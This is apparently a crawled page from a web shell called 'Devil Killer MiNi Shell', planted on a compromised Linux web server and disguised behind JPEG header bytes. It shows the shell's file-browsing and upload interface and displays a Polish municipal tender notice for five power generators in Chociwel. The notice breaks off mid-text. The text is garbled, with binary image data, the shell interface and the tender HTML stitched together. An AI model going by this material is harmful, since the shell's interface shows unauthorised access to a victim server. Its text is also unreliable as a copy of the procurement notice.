JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251107/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251107/0052203701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa 5 sztuk agregatów prądotwórczych dla gminy Chociwel. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Chociwel</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685680</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chociwel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">73-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">915622001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@chociwel.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chociwel.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa 5 sztuk agregatów prądotwórczych dla gminy Chociwel. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-98129270-c5db-49a6-9eb3-4fdafed69d89</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00522037</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00020285/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa 5 sztuk agregatów prądotwórczych dla gminy Chociwel.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://oneplace.marketplanet.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W przedmiotowym postępowaniu o<br/> udzielnie zamówienia komunikacja miedzy Zamawiającym a Wykonawcami w szczególności składania oświadczeń, wniosków,<br/> zawiadomień oraz przekazanie informacji odbywa się elektronicznie za pośrednictwem platformy Zamawiającego platformy<br/> zakupowej oneplace.marketplanet.pl https://oneplace.markryplanet.pl. W sytuacjach awaryjnych Platformy lub przerwie technicznej<br/> działania systemu Zamawiający dopuszcza możliwość komunikowania się przy użyciu poczty<br/> elektronicznej:zamowienia@chociwel.plz zaostrzeniem, iż oferty mogą zostać przekazane wyłącznie za pomocą poniższej<br/> Platformy. Instrukcja dla Wykonawców znajduje się na stronie Urzędu Miejskiego w Chociwlu - BIP- zamówienia publiczne <br/>wszczęte postępowania.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) - Dz. Urz. UE<br/> L 119<br/> z 04.05.2016, str. 1, dalej „RODO”, informuję, że:<br/> 1. Administratorem Pani/Pana danych osobowych jest:<br/> Burmistrz Chociwla<br/> ul. Armii Krajowej 52<br/> 73-120 Chociwel<br/> telefon: 91 5622024<br/> e-mail urzad@chociwel.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 3 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPU.TP.271.2.11.2025.IJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 162000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres przedmiotu zamówienia obejmuje dostawę, montaż oraz uruchomienie 5 sztuk agregatów prądotwórczych o parametrach technicznych opisanych poniżej. Dostarczone urządzenia mają zapewnić rezerwowe zasilanie elektryczne do urządzeń oczyszczalni ścieków oraz podtrzymanie energii do zasilania obiektów użyteczności publicznej w sytuacjach kryzysowych (ciepło, oświetlenie). <br/>2.	Oferowane urządzenia muszą być fabrycznie nowe, nieużywane, kompletne, zmontowane, gotowe do użycia zgodnie z celem ich przeznaczenia, wolne od wad fizycznych i prawnych, zgodne z właściwymi normami i przepisami prawa, w szczególności w zakresie dopuszczenia ich do obrotu i użytkowania. Zamawiający nie dopuszcza produktów prototypowych oraz sprzętu wyprodukowanego przed 2024 rokiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31682530-4 - Awaryjne urządzenia energetyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty ocenie i porównaniu poddane zostaną wyłącznie <br/>oferty niepodlegające odrzuceniu. <br/>2. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami: <br/>Kryterium Waga <br/>1. Cena 60 % <br/>2. Okres gwarancji 40 % <br/>3. Kryterium nr 1 Cena – według następujących zasad: <br/>W zakresie kryterium „CENA” (C) maksymalną ilość punktów otrzyma oferta z najniższą ceną, <br/>pozostałym Wykonawcom przyznana zostanie odpowiednio mniejsza liczba punktów, określona na <br/>podstawie następującego wzoru: <br/>cena najniższa spośród wszystkich ofert <br/>niepodlegających odrzuceniu <br/>Ocena badanej oferty = ---------------------------------------- x 100 pkt x 60% <br/>cena oferty badanej <br/>niepodlegającej odrzuceniu <br/>W ramach kryterium „Cena” można otrzymać maksymalnie 60 pkt. <br/>3. Kryterium nr 2: Okres gwarancji – według następujących zasad: <br/>a) Wymagany przez Zamawiającego minimalny okres gwarancji na dostarczone urządzenia wynosi 12 <br/>miesięcy; <br/>b) Zamawiający dokona oceny tego kryterium w zakresie od 24 do 36 miesięcy. Zaoferowany przez <br/>Wykonawcę okres gwarancji nie może być krótszy niż 24 miesięcy, natomiast gwarancja dłuższa niż 48 <br/>miesięcy nie będzie dodatkowo punktowana. <br/>W zakresie Kryterium „Okres gwarancji” maksymalną ilość punktów otrzyma oferta z najdłuższym <br/>okresem gwarancji, pozostałym Wykonawcom przyznana zostanie odpowiednio mniejsza liczba <br/>punktów, określona na podstawie następującego wzoru: <br/>Okres gwarancji oferty badanej <br/>Okres gwarancji = ------------------------------------------------- x100 pkt x 40 % <br/>Okres gwarancji oferty <br/>z najdłuższym okresem gwarancji <br/>c) W przypadku podania okresu gwarancji w innej formie niż wymagana lub pominięcie tego punktu w <br/>Formularzu oferty– Zamawiający przyjmie, że Wykonawca proponuje najniższy okres gwarancji, czyli 12 <br/>miesięcy. <br/>d) W ramach kryterium „Okres gwarancji” można otrzymać maksymalnie 40 pkt. <br/>4. Oceną oferty będzie suma punktów przyznanych według opisanych powyżej kryteriów wg wzoru: <br/>S= C+G gdzie: <br/>S – suma punktów przyznanych ofercie <br/>C- liczba punktów przyznanych ofercie w Kryterium Cena <br/>G – liczba punktów przyznanych ofercie w Kryterium Okres gwarancji <br/>5. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z <br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści <br/>złożonej oferty, w tym zaoferowanej ceny. <br/>7. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą – <br/>oferta z najwyższą liczbą punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielony na dostarczony sprzet.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują: <br/>1) w zakresie podstaw wykluczenia z postępowania: <br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej <br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów, z <br/>innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do <br/>udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z <br/>dokumentami lub informacjami, potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku <br/>o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej <br/>grupy kapitałowej - załącznik nr 4 do SWZ <br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: <br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów <br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów <br/>realizujących zadania publiczne, o ile Wykonawca w oświadczeniu, o którym mowa w art. 125 ust. 1 <br/>ustawy Pzp, poda dane umożliwiające dostęp do tych środków, <br/>2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi <br/>oświadczenia, o którym mowa w art. 125 ust. 1. <br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które <br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i <br/>aktualność. <br/>7. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w ust. 1 pkt. 1 lub jest ono niekompletne <br/>lub zawiera błędy, Zamawiający wezwie Wykonawcę odpowiednio do jego złożenia, poprawienia lub <br/>uzupełnienia w wyznaczonym terminie, chyba że oferta Wykonawcy podlega odrzuceniu bez względu <br/>na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania. <br/>8. Do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają <br/>przepisy: - rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie <br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać <br/>Zamawiający od Wykonawcy, - rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i <br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków <br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują: <br/>1) w zakresie podstaw wykluczenia z postępowania: <br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej <br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów, z <br/>innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do <br/>udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z <br/>dokumentami lub informacjami, potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku <br/>o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej <br/>grupy kapitałowej - załącznik nr 4 do SWZ <br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: <br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów <br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów <br/>realizujących zadania publiczne, o ile Wykonawca w oświadczeniu, o którym mowa w art. 125 ust. 1 <br/>ustawy Pzp, poda dane umożliwiające dostęp do tych środków, <br/>2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi <br/>oświadczenia, o którym mowa w art. 125 ust. 1. <br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które <br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i <br/>aktualność. <br/>7. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w ust. 1 pkt. 1 lub jest ono niekompletne <br/>lub zawiera błędy, Zamawiający wezwie Wykonawcę odpowiednio do jego złożenia, poprawienia lub <br/>uzupełnienia w wyznaczonym terminie, chyba że oferta Wykonawcy podlega odrzuceniu bez względu <br/>na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania. <br/>8. Do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają <br/>przepisy: - rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie <br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać <br/>Zamawiający od Wykonawcy, - rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i <br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków <br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. <br/>2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części <br/>zamówienia. <br/>3. Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza <br/>powierzyć podwykonawcom, i podania przez Wykonawcę nazw firm podwykonawców ( o ile już są <br/>wiadome na tym etapie). Wykonawca takie informacje zamieści w formularzu ofertowym. <br/>4. Wykonawca ma prawo do zmiany lub rezygnacji z podwykonawcy. <br/>5. <br/>Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z <br/>odpowiedzialności za należyte wykonanie tego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Przy dokonywaniu wyboru najkorzystniejszej oferty ocenie i porównaniu poddane zostaną wyłącznie <br/>oferty niepodlegające odrzuceniu. <br/>2. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami: <br/>Kryterium Waga <br/>1. Cena 60 % <br/>2. Okres gwarancji 40 % <br/>3. Kryterium nr 1 Cena – według następujących zasad: <br/>W zakresie kryterium „CENA” (C) maksymalną ilość punktów otrzyma oferta z najniższą ceną, <br/>pozostałym Wykonawcom przyznana zostanie odpowiednio mniejsza liczba punktów, określona na <br/>podstawie następującego wzoru: <br/>cena najniższa spośród wszystkich ofert <br/>niepodlegających odrzuceniu <br/>Ocena badanej oferty = ---------------------------------------- x 100 pkt x 60% <br/>cena oferty badanej <br/>niepodlegającej odrzuceniu <br/>W ramach kryterium „Cena” można otrzymać maksymalnie 60 pkt. <br/>3. Kryterium nr 2: Okres gwarancji – według następujących zasad: <br/>a) Wymagany przez Zamawiającego minimalny okres gwarancji na dostarczone urządzenia wynosi 12 <br/>miesięcy; <br/>b) Zamawiający dokona oceny tego kryterium w zakresie od 24 do 36 